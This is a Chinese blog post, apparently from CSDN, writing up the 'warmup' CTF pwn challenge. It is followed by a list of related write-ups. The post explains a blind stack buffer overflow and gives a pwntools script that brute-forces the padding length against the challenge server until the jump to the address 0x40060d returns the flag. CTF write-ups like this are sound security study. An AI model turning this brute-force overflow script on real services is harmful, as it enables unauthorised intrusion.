PWN做题笔记12-warmup(栈盲溢出)

已于 2023-05-16 15:19:59 修改
阅读量226 收藏
点赞数 1
文章标签: 笔记 系统安全
于 2023-05-16 15:19:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40923256/article/details/130706253
版权

这道题没给附件,nc一下,程序给了个地址,之后可以进行一次输入,之后就没有反馈了,推测该地址就是要溢出跳转的地址,会cat flag

整不出什么花活,直接简单的溢出

一种以32位程序进行,栈帧大小4字节,所以构建:

b"aaaa"*k+p32(addr) 

另一种以64位程序进行,栈帧大小8字节,所以构建:

b"aaaaaaaa"*k+p64(addr) 

64位的盲测出了结果,所以这里放64位版本的代码,程序如下:

addr=p64(0x40060d)

for i in range(1000):
	try:
		print("\n",i)
		p=remote("61.147.171.105",57702)
		payload=b"aaaaaaaa"*i+addr
		p.sendlineafter(">",payload)
		text=p.recv()
		print(text)

		p.interactive()
	except:
		p.close()

注意:

  • 单纯的recv在没有输出时会抛出异常
  • interactive会起新进程并挂起(类似fork+execv)需要ctrl+c结束进程退出,影响大规模测试

因此,二者结合并加入try-except接收recv的输出并绕过interactive,直到接收到输出,还是很巧妙地~

得到结果,结构大概是:

--------------
输入位置 
8个栈帧   
-------------
ebp     
-------------  
addr

_alpaca_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界PWN进阶区(warmup
BurYiA的博客
02-03 1521
warmup 这是一个没有附件,看起来目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
初识 pwn(get_shell、hello_pwn
Welcome To Myon'Blog !
04-01 1073
初识pwn、get_shell、hello_pwn、软件保护机制、exp脚本编写、pwntools、NX、IDA pro
pwn_warmup
weixin_44464829的博客
10-31 371
这个没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
第七届强网杯-PWN-【warmup
最新发布
llovewuzhengzi的博客
03-08 1144
如何布置参考使得第一个chunk布置相关rop,第二个chunk布置相关IO_FILE_plus_struct的伪造结构体,然后根据house of apple2来布置,并最后orw。
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 424
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界解系列14
重新启程
12-23 1826
目地址:warmup 这是高手进阶区的第三,我们先看下目内容 这个没有附件,那就是要fuzz的目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
攻防世界-level2
32bin的博客
04-08 265
【代码】攻防世界-level0。
Pwn】wp
weixin_52553215的博客
11-22 733
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
pwn 攻防世界刷记录
m0_75234353的博客
05-19 182
运行就能getshell直接nc。
buu:pwn warmup_csaw_2016
weixin_60553183的博客
11-29 2627
buu:pwn warmup_csaw_2016 第一次写pwn,得到文件放入ida 其实一开始和re的很像,都是寻找关键函数,怎么找,个人理解是要关注输入输出有无比较的地方,这里shb_40060D很明显就是关键函数,点进去,为什么呢,因为gets()函数很明显会有栈溢出漏洞,sub_40060D函数是后门。 找到了system和 cat flag.txt。 进入虚拟机,对文件进行checksec操作 发现没有任何防护 写exp 在终端运行得flag. ...
buuctf--pwn-warmup
weixin_45427676的博客
09-19 502
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 403
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
一道简单的pwn Escape_From_Jail-50
qq_41071646的博客
01-21 893
这道 真的 很难受  我都不知道怎么搞   也没有附件 我还以为是 出问了  然后我一个已经把这个过的人 告诉我 这个没有   额  那就很凉凉啊    然后直接 链接看看 是哪里除了问 后来 我甚至和一个搞web的朋友都想文件上传了    然后先连接 看看  #!/usr/bin/python #coding:utf-8 from pwn import* io=...
攻防世界——pwn_warmup
syk的博客
05-28 1791
checksec:没有开启任何保护 看到了熟悉的gets()函数,通常一看到这个函数就八成有缓冲区溢出漏洞,可以看出程序为v5开辟了40H的存储空间,所以输入长度超过40H即可造成溢出,再看sprint()函数 可以看到这个函数是获取flag的关键点,程序会打印出此函数的位置,即0x40060d,到这里思路就差不多明了了,我们需要控制溢出位置,把返回地址改为此函数的地址,我们当前函数的返回值位...
pwn-warmup
醉等佳人归
09-08 212
1.目 1.1.保护机制 不详 1.2.关键代码 没有提供代码 我们使用nc连接之后发现给了一个输入点和一个地址 2.思路 重点1:没有给代码,说明要我们使用fuzz 重点2:猜测给的地址是漏洞利用函数地址,应该可以通过栈溢出去调用, 重点3:所以我们fuzz的参数应该有两个,第一个是num即发送的字符串,第三个是flag即跟随的payload函数(0代表不跟随,1代表32位,2代表64位) from pwn import * from ctypes import * #context(arch="a
Pwn_9 作业讲解
weixin_30415113的博客
03-07 317
pwn1针对Alarm clock进行处理修改程序的16进制数值 Hook函数 将alarm函数替换掉在linux下使用命令 sed -i s/alarm/isnan/g ./pwn1 检查保护机制checksec --file ./pwn1NX 数据保护权限 可写的不可执行查看编译file ./pwn1./pwn1: ELF 32-bit LSB executable, Intel 8038...
【BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3256
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
护鼎杯pwn1 writeup
u014715599的博客
12-26 432
1.IDA分析漏洞利用点 这道ida分析比较简单,另直接gdb调试也可以,不过我没有找到怎么下断点,gdb载入起始地址没有找到。 (1)下图所示,这道比较简单,直接利用栈溢出将v4和v5的值修改为条件要求的就能直接开启一个shell(这里要注意pwn主要是利用漏洞拿到远程服务器的shell)。 (2)栈上格局分布 pattern测试溢出点() 测试的时候,需要借助ida,远程调试。 直...
2017广东红帽杯pwn1_writeup:简单ROP
ACdream
05-09 4128
先来正能量一波:作为一个一直没入门pwn的小菜鸟,这一段时间一直被学弟按在地上摩擦很不爽很不爽~~~~~~~~ ------------------------------------------------------------------------------------ 先给出几个学习链接: 一步一步ROP:x86 一步一步ROP:x64 论文: Return-O
Recho.doc pwn:栈溢出与shutdown漏洞利用
在"攻防世界pwn:Recho.doc"这份文档中,讨论了一个针对64位二进制文件的逆向工程和漏洞利用挑战。该文件没有启用canary和PIE保护机制,提供了丰富的学习材料。以下是关键知识点的详细解析: 1. **文件与环境分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值